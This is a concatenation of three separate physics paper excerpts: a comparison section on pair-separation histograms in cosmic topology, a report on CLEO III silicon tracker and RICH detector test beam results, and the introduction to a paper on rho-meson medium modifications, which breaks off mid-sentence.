\vspace{6mm}
\noindent \textbf{\large A Comparison}
\vspace{3mm}
In what follows we shall discuss the connection between
our results and those of references~\cite{LeLuUz,FagGaus}.
The results we have derived regarding PSH's for hyperbolic manifolds
do not match with the explanation given in~\cite{LeLuUz}
for the absence of spikes.
Indeed, in~\cite{LeLuUz} it is argued that two types of pairs of
images can give rise to spikes, namely \emph{type I} and \emph{type II}
pairs.
Considering these types of pairs they argue that in their simulated
PSH's built for the Weeks manifold there are no spikes because:
(i) the number of \emph{type I} pairs is too low; and (ii) \emph{type II}
pairs cannot appear in hyperbolic manifolds.
It should be noticed from the outset that the \emph{type II} pairs
in~\cite{LeLuUz} are nothing but the $\Gamma$-pairs of the present
article, whereas \emph{type I} pairs are not the uncorrelated pairs of
this paper. Now, since we have shown that (i) $\Gamma$-pairs as well
as uncorrelated pairs which arise (both) from the covering isometries
give rise to the topological signature for multiply-connected
manifolds, and (ii) the topological signal of $g$-pairs is a spike
(in a PSH) only if $g$ is a Clif\/ford translation, then the only
reason for the absence of spikes of topological origin in
PSH's corresponding to hyperbolic manifolds is that there is no
Clif\/ford translation in hyperbolic geometry.
Further, that the small number of~\emph{type I} pairs is not
responsible for the absence of spikes is endorsed by the
PSH for the Best manifold reported in~\cite{FagGaus}, which was
performed for an observed universe large enough so that it
contains in the mean approximately 30 topological images for
each cosmic object; and yet no spikes whatsoever of topological
origin were found in the PSH.
Using expression~(\ref{EPSH2}) for the EPSH one can also
clarify the ef\/fect of subtracting from the
PSH corresponding to a particular 3-manifold the PSH of
the underlying simply connected covering manifold. This type
of dif\/ference has been performed for simulated
comparable catalogues
(with equal number of images and identical cosmological
parameters) for the Best manifold and for $H^3$~\cite{FagGaus}.
In general the plots of that dif\/ference exhibit a fraction
$1/(N-1)$ of the topological signature of the isometries plus
(algebraically) the f\/luctuations corresponding to both PSH's
involved, namely the PSH for the underlying simply connected
space and the PSH for the multiply connected 3-manifold itself.
To understand that this is so, let us rewrite eq.~(\ref{noise-def1})
as
\begin{equation}
\label{noise-def2}
\Phi(s_i) = \Phi_{exp}(s_i) + \rho\,(s_i) \; ,
\end{equation}
where $\rho\,(s_i)$ denotes the noise (statistical f\/luctuations) of
$\Phi(s_i)$.
Using the decomposition~(\ref{noise-def2}) together with~%
(\ref{topsig2}) one easily obtains
\begin{equation} \label{FG-dif}
\Phi(s_i) - \Phi^{sc}(s_i) = \frac{1}{N-1}\,\varphi^{S}(s_i)
+ \, \rho\,(s_i)- \rho^{sc}(s_i) \; ,
\end{equation}
where $\varphi^{S}(s_i)$ denotes the topological signature,
which is given by~(\ref{topsig2}).
According to (\ref{topsig1}), (\ref{topsig2}) and (\ref{noise-def2}),
had they examined the dif\/ference $\Phi(s_i) - \Phi_{exp}^{sc}(s_i)$,
between the PSH built from that Best manifold and the EPSH for the
corresponding covering space, they would have expurgated
the noise $\rho^{sc}(s_i)$, and thus their plot
(f\/ig.~3 in~\cite{FagGaus}) would simply contain
a superposition of the topological signature
and just one noise, $\rho\,(s_i)$.
As a matter of fact, the ``wild oscillations in the scale of the
bin width'' they have found are caused by the superposition of
the two statistical f\/luctuations $\rho^{sc}(s_i)$ and
$\rho\,(s_i)$, whereas the ``broad pattern on the scale of
$R_0$'' ought to carry basic features of the topological
signature corresponding to the Best manifold they have examined.
But again, a detailed account of these points is a matter that
has been discussed in~\cite{GRT00}~--~\cite{GRT01}.
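The factor of two in variance can be checked with a toy model (ours): represent each bin of a PSH as its expected value plus an independent fluctuation of size $\sigma$; the difference of two noisy histograms then carries noise $\sqrt{2}\,\sigma$, while subtracting the (noise-free) EPSH leaves only $\sigma$:

```python
import math
import random

rng = random.Random(11)
sigma, n_bins = 1.0, 20000

expected = [0.0] * n_bins                        # stand-in for the EPSH
noisy = lambda: [rng.gauss(mu, sigma) for mu in expected]
phi, phi_sc = noisy(), noisy()                   # two independent noisy PSH's

def rms(values):
    return math.sqrt(sum(v * v for v in values) / len(values))

two_noises = rms([a - b for a, b in zip(phi, phi_sc)])       # ~ sqrt(2) * sigma
one_noise = rms([a - mu for a, mu in zip(phi, expected)])    # ~ sigma
assert 1.2 < two_noises / one_noise < 1.6                    # ratio ~ sqrt(2)
```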
Finally, regarding the peaks of ref.~\cite{Fagundes-Gausmann}
it is important to bear in mind that graphs tend to be ef\/fective
mainly to improve the degree of intuition, to raise questions to
be eventually explained, and for substantiating theoretical results.
Often, however, they do not constitute a proof for a result, such
as the EPSH~(\ref{EPSH2}) we have formally derived from rather general
f\/irst principles. A good example which shows the limitation
of the conclusions one can draw from such graphs comes exactly
{}from the PSH shown in f\/ig.~1 of ref.~\cite{Fagundes-Gausmann},
where there is a signif\/icant peak which according to
our results clearly {\em cannot\/} be of topological origin
because it does not correspond to any translation.
Note, however, that just by examining that graph one cannot at all
decide whether that sharp peak is of topological nature or
arises from purely statistical f\/luctuations.
In brief, just by examining PSH's one cannot at all distinguish
spikes of topological origin from sharp peaks of purely statistical
nature --- our statistical analysis of the distance correlations in
PSH's elucidates the ultimate role of all types of isometries (in PSH's)
and is necessary to separate the spikes (sharp peaks) of
dif\/ferent nature.
\section*{Acknowledgements}
We thank the scientif\/ic agencies CNPq, CAPES
and FAPERJ for f\/inancial support. G.I.G. is grateful
to Helio Fagundes for introducing him to the method of
cosmic crystallography and to Evelise Gausmann for fruitful
conversations.
|
\section{Introduction}
The Cornell $e^+e^-$\ collider (CESR) is currently being upgraded to a luminosity
in excess of
$1.7\times 10 ^{33} {\rm cm }^{-2}{\rm s}^{-1}$. In parallel the CLEO III
detector is undergoing some major improvements.
One key
element of this upgrade is the construction of a four layer double-sided
silicon tracker.
This detector
spans the radial distance from 2.5 cm to 10.1 cm and covers 93\%
of the solid angle surrounding the interaction region. The
outermost layer is 55 cm long and will present a large
capacitive load to the front-end electronics. The innermost layer must
be capable of sustaining large singles rates typical of a detector
situated near an interaction region.
A novel feature of CLEO III is a state of the art particle identification system that
will provide excellent hadron identification at all the momenta relevant to
the study of the decays of B mesons produced at the $\Upsilon(4S)$\ resonance. The technique
chosen is a proximity focused Ring Imaging Cherenkov detector
(RICH)~\cite{upsil}
in a barrel geometry occupying 20 cm of radial space between the tracking system
and the CsI electromagnetic calorimeter.
The physics reach of CLEO III is quite exciting: the increased sensitivity of the upgraded
detector, coupled with the higher data sample available, will provide a great sensitivity
to a wide variety of rare decays, CP violating asymmetries in rare decays and precision
measurements of several Cabibbo-Kobayashi-Maskawa matrix elements.
\section{Vertex Detector Design}
The barrel-shaped CLEO III Silicon Tracker (Si3) is composed of 447 identical sensors combined
into 61 ladders. The sensors are double sided with ${\rm r}\phi$ readout on the n side and
z strips on the p side. The strip pitch is 50 $\mu$m on the n side and 100
$\mu$m on the p side.
Readout hybrids are attached at both ends of the ladders, each reading
out half of the ladder sensors. More details on the detector design can be found elsewhere.~\cite{ian} Sensors and
front end electronics are connected by flex circuits that have traces with a 100 $\mu$m pitch on
both sides, manufactured by General Electric, Schenectady, New York.
All the layers are composed of identical sensors. In order to simplify the sensor
design, the detector biasing resistors and the coupling capacitors have been removed from
the sensor into a dedicated R/C chip, mounted on the hybrid. Another key feature in the sensor
design is the so called ``atoll'' geometry of the p-stop barriers, using isolated p-stop rings
surrounding individual n-strips. Furthermore a reverse bias can be applied to the p-stop barriers through a
separate electrode. Thus
the parasitic capacitance associated with these insulation barriers can be significantly
reduced with a corresponding reduction of the sensor noise in the frequency range
of interest.~\cite{george}
The middle chip in the readout chain is the FEMME preamplifier/shaper VLSI device.
It has an excellent noise performance. At the shaping time of 2$\mu$s, well matched to the CLEO III
trigger decision time, its equivalent noise charge is measured as:
\begin{equation}
ENC = 149\,e^- + (5.5\,e^-/pF)\times C_{in},
\end{equation}
giving satisfactory noise performance also with the high input capacitances in the outer layer
sensors. More details on the design and performance of this device can be found elsewhere.~\cite{osu}
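As a quick numerical reading of this linear noise model (the 30 pF load below is an assumed, illustrative value for a long outer-layer ladder, not a quoted measurement):

```python
def enc_electrons(base, slope_per_pf, c_in_pf):
    """Equivalent noise charge: ENC = base + slope * C_in, in electrons."""
    return base + slope_per_pf * c_in_pf

# FEMME at 2 us shaping: ENC = 149 e- + (5.5 e-/pF) x C_in
assert enc_electrons(149, 5.5, 0) == 149
# with an assumed ~30 pF load, of the order expected for a long outer ladder:
assert enc_electrons(149, 5.5, 30) == 314.0
```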
The last chip in the readout chain is the SVX\_CLEO digitizer and
sparsifier.~\cite{george} Both these chips are manufactured utilizing radiation-hard CMOS technology from
Honeywell.
\section{The Si3 test beam run}
The silicon sensors have been tested in several test beam runs that took place at CERN in the
last few months. The sensors, flex circuits, and R/C chips used were the same ones planned
for the final system. However the readout electronics used was not
the combination of FEMME + SVX\_CLEO, but the low noise VA2 chip produced
by IDE AS, Norway~\cite{einar} with digitization implemented in the remote data acquisition
system.
The data were collected by inserting the Si3 sensor in the test beam set-up used by the RD42
collaboration~\cite{rd42} to test their diamond sensors. A 100 GeV $\pi$ beam was used and the
silicon sensor was inserted in a silicon telescope composed of 8 microstrip reference planes
defining the track impact parameters with a precision of about 2 $\mu$m. Two data sets were
collected. The first one contains 300,000 events with tracks at normal incidence and different
bias points. The second one consists of about 200,000 events at $\theta =0$
and
$\theta =10 ^{\circ}$.
\begin{figure}
\begin{center}
\vspace{-1.4cm}
\psfig{figure=fig_r877_res.ps,height= 3.5in}
\vspace{-1.7cm}
\caption{Residual distribution with $\eta$ algorithm at $V_{bias}$=100 V and
$V_{pstop}=20 V$.}
\end{center}
\label{fig:resol}
\end{figure}
The probability distribution of the variable $\eta$
defined as $\eta =Q_L/(Q_L+Q_R)$ (referring to the relative location of
two adjacent strips where at least one of them recorded a hit) has
been mapped and has been used in a non-linear charge
weighting to reconstruct the track hit location.~\cite{weil} Fig.~1 shows
the hit resolution achieved on the n-side with a detector bias of 100 V and
a p-stop reverse bias of 20 V. A value of $\sigma$ of 6 $\mu$m is quite impressive for a track
at normal incidence. The expectation for a 50 $\mu$m strip pitch is about
9 $\mu$m, as the charge spreading due to diffusion does
not provide appreciable signal in the neighboring strip unless the
track impact point is at the periphery of the strip. The higher resolution
achieved in this case is attributed to an increase in charge spread due to the
reverse biased p-stops. In fact the ability to modulate the reverse bias of the
p-stops has allowed the tuning of this charge sharing for optimum
resolution and may be of interest for other applications.
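The non-linear $\eta$ weighting can be sketched as follows (our illustration; in practice the mapped probability distribution of $\eta$ replaces the toy uniform sample, and the position offset and sign conventions depend on the readout geometry):

```python
import bisect
import random

def make_eta_map(eta_samples):
    """Normalized integral N(eta) of the mapped eta probability distribution."""
    ordered = sorted(eta_samples)
    def n_of_eta(eta):
        return bisect.bisect_right(ordered, eta) / len(ordered)
    return n_of_eta

def eta_position(q_left, q_right, n_of_eta, pitch_um=50.0):
    """Interpolated hit position (in um) within one strip pitch."""
    eta = q_left / (q_left + q_right)   # eta = Q_L / (Q_L + Q_R), as in the text
    return pitch_um * n_of_eta(eta)

# toy calibration sample: for a uniform eta distribution the algorithm
# reduces to linear charge weighting
rng = random.Random(5)
n_map = make_eta_map([rng.random() for _ in range(100000)])
assert abs(eta_position(10.0, 10.0, n_map) - 25.0) < 0.5  # equal sharing -> mid-pitch
```

The gain over linear weighting comes precisely from the non-uniform measured $\eta$ distribution, which encodes the actual charge-sharing profile between neighboring strips.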
\section{Description of the CLEO III RICH System}
The CLEO III RICH system is based on the `proximity focusing' approach, in
which
the Cherenkov cone, produced by relativistic particles crossing a LiF radiator,
is allowed to expand in a volume filled with gas transparent to
ultraviolet light before intersecting a photosensitive detector where the
coordinates of the Cherenkov photons are reconstructed. The photodetector is a multiwire proportional chamber filled with a mixture of Triethylamine (TEA) gas
and Methane. The TEA molecule has good quantum efficiency (up to 35\%) in
a narrow wavelength interval between 135 and 165 nm and an absorption length of
only 0.5 mm.
The position of the photoelectron emitted by the TEA molecule
upon absorption of the Cherenkov photon is detected by sensing the induced
charge on an array of $7.6\,{\rm mm} \times 8\,{\rm mm}$ cathode pads. The probability distribution for the charge in the avalanche initiated by a single photoelectron
is exponential at low gain. This feature implies that a low noise
front end electronics is crucial to achieve good efficiency. A dedicated
VLSI chip, called VA\_RICH, based on a very successful chip developed for
solid state application, has been designed and produced for our application
at IDE AS, Norway. We have acquired and characterized all the hybrids necessary
to instrument the whole RICH detector, a total of 1800 hybrids containing
two VA\_RICH chips each, corresponding to
230,400 readout channels. For
moderate values of the input capacitance $C_{in}$, the equivalent noise
charge $ENC$ is found to be about:
\begin{equation}
ENC = 130 e^- + (9e^- /pF)\times C_{in}.
\end{equation}
The traces that connect the cathode pads with the input of the preamplifier in
the VA\_RICH are rather long and the expected value of $ENC$ in the absence of
other contribution is of the order of 200 $e^-$.
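For an exponential pulse-height distribution with mean gain $G$, the fraction of single photoelectrons above a threshold $Q_{th}$ is $\varepsilon = e^{-Q_{th}/G}$, which quantifies why the noise floor matters. The numbers below (a 5$\sigma$ threshold on a 200 $e^-$ noise) are our illustration, not quoted operating values:

```python
import math

def spe_efficiency(threshold_e, mean_gain_e):
    """Fraction of an exponential single-photoelectron spectrum above threshold."""
    return math.exp(-threshold_e / mean_gain_e)

def gain_for_efficiency(threshold_e, efficiency):
    """Mean gain needed to keep a given single-photoelectron efficiency."""
    return -threshold_e / math.log(efficiency)

noise_e = 200.0              # of the order of the expected ENC quoted above
threshold = 5.0 * noise_e    # an assumed 5-sigma zero-suppression threshold
assert round(gain_for_efficiency(threshold, 0.90)) == 9491
assert spe_efficiency(threshold, 20000.0) > 0.95
```

Halving the noise halves the required threshold and thus the chamber gain needed for the same efficiency, easing the operating point of the photodetector.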
The charge signal is transformed into a differential current output transmitted
serially by each hybrid to a remote data acquisition board, where the currents
are transformed into voltages by transimpedance amplifiers and then digitized by
a 12 bit flash-ADC capable of digitizing the voltage difference at its input.
The data boards perform several additional complex functions, like providing
the power supply and bias currents necessary for the VA\_RICH to be at its optimal
working point. In addition, the digital component of these boards provides
sparsification, buffering and memory for pedestal and threshold values.
If a track crosses the LiF radiator at normal incidence, no light is emitted
in the wavelength range detected by TEA, due to total internal reflection.
In order to overcome this problem a novel radiator geometry has been
proposed.~\cite{alex} It involves cutting the outer surface of the radiator like the
teeth of a saw, and therefore is referred to as ``sawtooth radiator''. A detailed
simulation of several possible tooth geometries has been performed and a
tooth angle of 42$^{\circ}$ was found to be close to optimal and technically
feasible.~\cite{alex}
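The blindness of a flat radiator at normal incidence can be checked directly: the photons meet the exit face at the Cherenkov angle itself and are totally internally reflected whenever $n\sin\theta_c>1$, i.e. whenever $n>\sqrt{2}$ for $\beta\approx 1$. The index $n\approx 1.5$ used below for LiF in the TEA-sensitive band is an assumed representative value:

```python
import math

def cherenkov_angle(n, beta=1.0):
    """Cherenkov angle: cos(theta_c) = 1 / (n * beta)."""
    return math.acos(1.0 / (n * beta))

def trapped_at_normal_incidence(n, beta=1.0):
    """True if light from a normal-incidence track is totally internally
    reflected at a flat exit face (where the exit angle equals theta_c)."""
    return n * math.sin(cherenkov_angle(n, beta)) > 1.0

n_lif = 1.5  # assumed representative index of LiF in the TEA-sensitive band
assert trapped_at_normal_incidence(n_lif)            # hence the sawtooth geometry
assert math.degrees(cherenkov_angle(n_lif)) > 48.0   # theta_c ~ 48.2 deg at beta ~ 1
```

Tilting the exit surface, as the sawtooth profile does, changes the local angle of incidence and lets this light escape toward the photodetector.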
There are several technical challenges in producing these radiators, including
the ability to cut the teeth with high precision without cleaving the
material and polishing this complex surface to yield good transmission properties
for the ultraviolet light. One of the goals of the test beam run described below
was to measure the performance of sawtooth radiators and we were able to produce
two full size pieces working with OPTOVAC in North Brookfield, Mass. The
light transmission properties of these two pieces were measured relative to a
plane polished sample of LiF and found to be very good.~\cite{icfa}
\section{Test beam results}
Two completed CLEO III RICH modules were taken to Fermilab and exposed
to high energy muons emerging from a beam dump. Their momentum was $\ge$ 100 GeV/c
The modules were mounted on a leak tight aluminum box with the same mounting
scheme planned for the modules in the final RICH barrel. One plane radiator and
the two sawtooth radiators were mounted inside the box at a distance from the
photodetectors equal to the one expected in the final system. Two sets of multiwire
chambers were defining the $\mu$ track parameters and the trigger was
provided by an array of scintillator counters. The data acquisition system was
a prototype for the final CLEO system.
The beam conditions were much worse than expected: the background
and particle fluxes were about two orders of magnitude higher than we expect
in CLEO and in addition included a significant neutron component that will
be absent in CLEO. Data were taken corresponding to different track incidence
angles and with tracks illuminating the three different radiators. For the
plane radiator, we were able to configure the detector so that the photon
pattern would appear only in one chamber. For the sawtooth radiator a
minimum of three chambers would have been necessary to have full acceptance.
The study of this extensive data sample has been quite laborious and the full
set of results is beyond the scope of this paper. The results from two typical
runs will be summarized in order to illustrate the expected performance from our system:
the first case will involve tracks incident at 30$^{\circ}$ to the plane
radiator and the second tracks incident at 0$^{\circ}$ on a sawtooth radiator.
\begin{figure}
\begin{center}
\vskip 0.5cm
\psfig{figure=reso_vs_ng_flat.ps,height= 3.5 in}
\vspace{-1.0cm}
\caption{The Cherenkov angular resolution per track as a function of the number
of detected photons (background subtracted) for a plane radiator with tracks
at 30$^{\circ}$ incidence.}
\end{center}
\label{fig:sngf}
\end{figure}
\begin{figure}
\begin{center}
\vspace{0.8cm}
\psfig{figure=reso_vs_ng_sawt.ps,height= 3.5 in}
\vspace{-2.0cm}
\caption{The Cherenkov angular resolution per track as a function of the number
of detected photons (background subtracted) for a sawtooth radiator with tracks
at normal incidence.}
\end{center}
\label{fig:sngs}
\end{figure}
The fundamental quantities that we study to ascertain the expected performance
of the system are the number of photons detected in each event and the angular
resolution per photon. The measured distributions are compared with the predictions of
a detailed Monte Carlo simulation, including information on the CH$_4$-TEA
quantum efficiency as a function of wavelength, ray tracing, crystal transmission, etc. It also includes a rudimentary model of the background, attributed
to out-of-time tracks. The agreement between Monte Carlo
and data is quite good. The average number of detected photoelectrons is about
14 after background subtraction and the angular resolution per photon is
about 13.5$\pm$ 0.2 mr.
For the sawtooth radiator the average number of photons, after background
subtraction, is 13.5, with a geometrical acceptance of only 55\% of the final system. In this
case it can be seen that the expected resolution is slightly better than
the one achieved. In order to estimate the particle identification power in our system,
we need to combine the information provided by all the Cherenkov photons in
an
event. We can use the resolution on the mean Cherenkov angle per track as an estimator
for the resolving power in the final system.
\begin{table}
\begin{center}
\caption{Summary on the performance of the RICH modules in two typical
test beam runs. The symbol $\gamma$ refers to single photon
distributions and the symbol $t$ refers to quantities averaged
over the photons associated with a track.}\label{tab:smtab}
\vspace{0.5cm}
\begin{tabular}{|c|c|c|}
\hline
\raisebox{0pt}[12pt][6pt]{Parameter} &
\raisebox{0pt}[12pt][6pt]{Plane Radiator} &
\raisebox{0pt}[12pt][6pt]{Sawtooth Radiator} \\
\raisebox{0pt}[12pt][6pt]{~~}&
\raisebox{0pt}[12pt][6pt] {($30^{\circ}$)}&
\raisebox{0pt}[12pt][6pt] {($0^{\circ}$)} \\
\hline
$\sigma _{\gamma}$ & 13.5 mr & 11.8 mr\\
$<N_{\gamma }>$ & 15.5 & 13.5 \\
$\sigma _t$ & 4.5 mr & 4.8 mr \\
$\sigma _t (MC)$& 3.9 mr & 3.8 mr \\
$\sigma _t (CLEO)$ & 4.0 mr & 2.9 - 3.8 mr\\
\hline
\end{tabular}
\end{center}
\end{table}
\vspace*{3pt}
Table 1 shows a summary of the predicted and achieved
values of these variables in the two data sets discussed in this paper and in the corresponding
Monte Carlo simulation, as well as the expectations for the final system.
Fig.~2 shows the
measured resolution per track $\sigma _t$ as a function of the
background subtracted number
of photons detected for the flat radiator and Fig.~3 shows the
corresponding curve for the sawtooth radiator. The curves are
fit to the parameterization $\sigma_t^2 = (a/\sqrt{N_{ph}})^2+b^2$.
The data shown, although preliminary, show a good understanding of the system and give confidence that
the predicted level of efficiency versus resolution will be achieved in CLEO III. An active analysis
program is under way to study the additional data available.
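With this fit form, the per-track resolution combines the photon-statistics term and a common (correlated) error term in quadrature; plugging in the Table 1 numbers checks the scaling (the constant term of $\approx 2.9$ mr below is inferred by us from that form, not a quoted CLEO number):

```python
import math

def sigma_track(sigma_photon_mr, n_photons, b_mr):
    """Per-track resolution: sigma_gamma/sqrt(N) and a common term in quadrature."""
    return math.hypot(sigma_photon_mr / math.sqrt(n_photons), b_mr)

# photon-statistics term alone, plane radiator at 30 deg (Table 1 numbers):
assert abs(sigma_track(13.5, 15.5, 0.0) - 3.43) < 0.01
# a common-error term of ~2.9 mr would reproduce the measured ~4.5 mr
assert abs(sigma_track(13.5, 15.5, 2.9) - 4.5) < 0.1
```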
\section{Conclusions}
Both the major systems for the CLEO III detector are well under way. Test run data support the
expectations of excellent performance of both the silicon tracker and the Ring Imaging Cherenkov
detector. This will lead to a quite exciting physics program expected to start in 1999.
\section{Acknowledgements}
The author would like to thank her colleagues in the CLEO III Si3 and RICH groups for their excellent work
reported in this paper. Especially noteworthy were P. Hopman, H. Kagan, I. Shipsey and M. Zoeller for their help in
collecting the information relative to the Si3 tracker, S. Anderson, S. Kopp, E. Lipeles, R. Mountain, S. Schuh, A. Smith,
T. Skwarnicki, G. Viehhauser
who were instrumental in a successful test beam run. Special thanks are due to C. Bebek and S. Stone for their
help throughout the length of the RICH project.
\section*{References}
|
\section{Introduction}
\label{sec:intro}
Hadronic dynamics has until recently comprised two
non-overlapping domains, distinctly separated along the lines of their
respective description of matter as hadronic or quark. On the
low-energy side of the spectrum, matter is probed on a scale where
pions and baryonic resonances are the relevant constituents. These
have been rather succesfully employed by quasi-phenomenological models
in providing prescriptions for free and in-medium hadronic
interactions. At the higher-energy end, far above energies typical of
baryonic resonances, quark degrees of freedom become accessible and
matter tends asymptotically towards quark-gluon plasma. In this
regime, described by perturbative QCD, quarks become deconfined and
chiral symmetry is restored.
Although the origin of quark confinement is not known, it is evident
that, whatever the reasons, it must induce spontaneous breaking of
chiral symmetry \cite{casher}. The two phenomena are therefore linked
and in the limit of chiral symmetry restoration, as quark masses tend
to zero, vector-meson masses and widths are also expected to change
\cite{pisar}. The transition from hadronic to quark matter and the
effect of increasing density and temperature on the properties of
light vector mesons have been addressed in the context of QCD sum
rules \cite{hat} as well as effective Lagrangians \cite{geb1}. In
particular, a temperature and density dependent lowering of the
$\rho^0$ mass is regarded as a precursor of the chiral phase
transition, expected to be measurable even at normal nuclear density
\cite{geb2}. Thus, the energy region from hadronic phenomenology to
the domain of perturbative QCD has come to the foreground, as the
study of vector-meson property modifications in this range appears to
be holding the key to understanding the mechanism of chiral symmetry
restoration.
The recent advent of high duty-cycle photon beams, on one hand, and
high-resolution dilepton spectrometers, on the other, has opened up
the possibility of reconciliation between the hadronic and quark
depictions of matter. Hadronic probes coupled with hadron
spectrometers had been extensively used in the past for energies up to
the $\Delta$ resonance, but higher-up, where multi-pion production
channels increasingly dominate, the combination becomes rapidly
cumbersome due to medium distortions from initial and final state
interactions. For the study of the vector mesons that couple to
multi-pion states, the photon is ideally suited. The recognition of
the electromagnetic interaction as an indispensable probe at either
the entrance or the exit channel, if the vector-meson field in the
nuclear medium is to be delineated, has generated activity in a
variety of fields.
\subsection{Relativistic Heavy Ion Results}
At relativistic energies, under extreme conditions of temperature and
density, the quest for signs of a phase transition from hadronic
matter to quark-gluon plasma is at the heart of experimental programs
using heavy-ion beams (e.g. at CERN, GSI, and RHIC) and dilepton
spectrometers. A series of pioneering studies from the CERES,
HELIOS-3, and NA50 collaborations at SPS/CERN with central S + Au, S +
W, Pb + Au, and Pb + Pb collisions, have largely been interpreted as
indicative of a downward shift of the $\rho^0$ mass in the nuclear
medium \cite{ceres,he3}. The invariant mass spectra for dilepton
production that have been measured in these experiments, when compared
with the respective p-A spectra, show a large enhancement at low
invariant mass regions. The excess dileptons are thought to originate
from the decay of mesonic resonances produced in $\pi^+\pi^-$
annihilation and, in the mass region 0.2$<$m$_{l^+l^-}<$0.5 GeV/c$^2$,
the models advocating vector-meson medium modifications attribute the
enhancement to the decay of the $\rho^0$ meson with a downward-shifted
mass \cite{geb3,cas}. Nonetheless, an explanation in terms of
conventional phenomenological $\rho^0$-meson medium modifications is
also consistent with the CERN data \cite{chanfray,ccf,friman}. In
this more conservative approach, the $\rho^0$ spectral function below
0.6 GeV/c$^2$ in dilepton invariant mass is appreciably enhanced from
the contributions of ``rhosobar''-type excitations such as the $\Delta
N^{-1}$, N$^*$(1720)N$^{-1}$ and $\Delta^*(1905) N^{-1}$, a
consequence of the strong coupling of the $\rho^0$ meson with
$\pi^+\pi^-$ states in the nuclear medium. This being the case, the
downward shift of the $\rho^0$-meson mass in the nuclear medium may
amount to no more than a convenient parametrization
\cite{chanfray}.
From a theoretical perspective, a model combining chiral SU(3)
dynamics with vector-meson dominance in an effective Lagrangian has
shown that chiral restoration does not demand a drastic reduction of
vector-meson masses in the nuclear medium \cite{weise}. The latter
model, in qualitative agreement with the hadronic-phenomenological
models \cite{chanfray,friman}, predicts a substantial enhancement of
the $\rho^0$ spectral density below the nominal resonance mass, with
only a marginal mass reduction. This result is tantamount to the
$\rho^0$ dissolving in the medium. Moreover, interpretations of the
CERES data as the outcome of either medium-modified hadronic
interactions or interactions of dissociated quarks in the quark-gluon
phase yield remarkably consistent results in the framework of
Ref.~\cite{weise}, leading to the conjecture that both the hadronic
and quark-gluon phases must be present \cite{weise}. The latter
conclusion is also drawn by a synthesis of the mass-scaling
\cite{geb2} and hadronic-phenomenological \cite{friman} models,
leading to the prediction that dynamical-hadronic effects that are
dominant up to about nuclear density, mainly via the highly-collective
N$^*$(1520)N$^{-1}$ state, gradually give way to $\rho^0$-meson mass
scaling as the quark degrees of freedom become increasingly
relevant. In the intermediate crossover region of ``duality'', both
the hadronic and quark-gluon phases of matter are expected to coexist
\cite{rwbr}. Thus, although a consensus has been reached on the issue
of coexistence of the hadronic and quark-gluon phases in the
transition region roughly placed upwards from $\sim$1~GeV, the
question remains as to the extent to which the nuclear medium induces
modifications to the $\rho^0$ mass and width.
Other less directly related experimental conjectures of medium
modifications of the $\rho^0$ mass have been deduced from an anomalous
J/$\psi$ suppression, reported by the NA50 collaboration for Pb + Pb
collisions \cite{jpsi}, enhanced K$^+$-$^{12}C$ scattering cross
sections \cite{kaons}, and an IUCF experiment of polarized proton
scattering on $^{28}$Si, though in the latter the medium
renormalization of the $\rho^0$ mass required for agreement with the
data is inconsistent for different observables measured in the same
experiment \cite{si}.
In summary, the experimental results discussed so far are inconclusive
with regard to the magnitude of the $\rho^0$-meson medium mass
modification, and underline the limitations encountered in complex
processes, where the probe interacts with nuclear matter via the
strong interaction and the channel being investigated may not be
disentangled from conventional medium effects.
\subsection{Electromagnetic Probe Results}
These difficulties are largely overcome with the use of photons which
do not suffer from initial state interactions. The availability of
high-flux photon beams, which have compensated for the low interaction
cross sections with nuclear matter, complemented by wide-angle
multi-particle spectrometers, have made possible a new generation of
experiments. In the E$_\gamma\sim$1 GeV region, matter is probed at
short distances $\le$1 fm, which is at the gateway of the energy range
where vector-meson properties are expected to undergo
modifications. In this domain, baryons and mesons are still the
relevant constituents for the description of matter, yet their quark
content becomes increasingly manifest, a fact which is reflected in
QCD-inspired phenomenological models \cite{isg,sai}. The $\rho^0$
meson is the best candidate among the light vector mesons
$\rho^{0,\pm}$, $\omega$, and $\varphi$ as a probe of medium
modifications, since, due to its short lifetime and decay length (1.3
fm), a large portion of $\rho^0$ mesons produced on nuclei will decay
in the medium.
For effective measurements with the photon as probe in the 1 GeV
region, kinematically complete experiments are required, which in turn
necessitate the use of high-duty-cycle tagged photon beams and
large-acceptance multi-particle spectrometers. These requirements were
met by the TAGX detector \cite{maru} at the Institute for Nuclear
Study (INS), where the TAGX collaboration has completed a series of
experiments with the ${^3}He$($\gamma$,$\pi^+\pi^-$)X reaction and a
10\% duty-cycle tagged photon beam. First, a lower-energy experiment
(380$\le$E$_\gamma\le$700 MeV) measured the single- and
double-$\Delta$ contributions to $\pi^+\pi^-$ production
\cite{watts}. Having established these important non-$\rho^0$ dipion
processes, the kinematics of the ${^3}He$($\gamma$,$\pi^+\pi^-$)X
reaction were investigated in the range 800$\le$E$_\gamma\le$1120 MeV,
aiming at the $\rho^0 \rightarrow \pi^+\pi^-$ channel.
Both the coherent and quasifree $\rho^0$ photoproduction mechanisms
are relevant in the energy region of interest. For a ${^3}He$ target,
the energy threshold for the former is E$_\gamma \approx$ 873 MeV,
whereas the 1.083~GeV energy threshold of the elementary $\rho^0$
photoproduction reaction on a nucleon is lowered for the quasifree
channel in the nuclear medium, as the Fermi momentum of the struck
nucleon may be utilized to bring the $\rho^0$ meson on shell. Coherent
photoproduction on nuclei is characterized by small four-momentum
transfers, resulting in $\rho^0$ mesons which mostly decay outside of
the nucleus \cite{crho}. This channel is, consequently, of limited
utility in probing vector-meson medium modifications.
In contrast, quasifree subthreshold photoproduction (E$_\gamma <$
1.083~GeV) on one hand warrants that the interaction took place in the
interior of the nucleus, since the nucleon Fermi momentum is required
to produce the $\rho^0$, and on the other produces slower $\rho^0$
mesons, more likely to also decay inside the nucleus. Moreover,
subthreshold photoproduction, whether the target nucleus remains bound
in the final state (exclusive channel) or decomposes to its
constituent nucleons (breakup channel), may be correlated with either
a nuclear mean-field or nucleonic medium effect on vector-meson
properties (Section~\ref{sec:int}). Specifically, exclusive
subthreshold photoproduction produces $\rho^0$ mesons which, on the
average, traverse distances comparable to the size of the nucleus
before their hadronic decay. This process is therefore a probe of
vector-meson medium modifications at normal nuclear densities, a
regime which has been the focus of mean-field driven theoretical
models. The breakup channel, on the other hand, is more likely to
produce $\rho^0$'s which are slower relative to the struck nucleon and
may travel distances shorter than the nucleonic radius before decaying
(Section~\ref{sec:int}). Thus, large densities in the interior of the
nucleon may become accessible via the breakup channel, amounting to a
nucleonic medium effect. This is the realm of the emerging
hadronic-quark nature of matter, a domain virtually unexplored. In the
deep subthreshold region, and for large momentum transfers to the
target nucleus, the coherent and exclusive-quasifree channels are
